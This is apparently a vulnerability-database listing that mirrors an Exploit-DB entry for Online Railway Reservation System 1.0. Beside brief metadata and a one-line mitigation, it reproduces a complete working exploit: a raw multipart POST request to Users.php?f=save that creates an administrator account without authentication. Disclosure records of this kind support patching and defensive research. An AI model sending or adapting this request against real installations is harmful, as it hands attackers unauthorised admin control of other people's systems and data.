Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)

vendor:

Online Railway Reservation System

by:

Zachary Asher

8.8

CVSS

HIGH

Account Creation

264

CWE

Product Name: Online Railway Reservation System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:online_railway_reservation_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Online Railway Reservation System 1.0

2022

Online Railway Reservation System 1.0 – Admin Account Creation (Unauthenticated)

An unauthenticated user can create an admin account by sending a POST request to the Users.php file with the required parameters. This allows the user to gain access to the admin panel of the Online Railway Reservation System 1.0.

Mitigation:

Authentication should be implemented to prevent unauthenticated users from creating admin accounts.

Source

Exploit-DB raw data:

#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0

=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602

-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"

1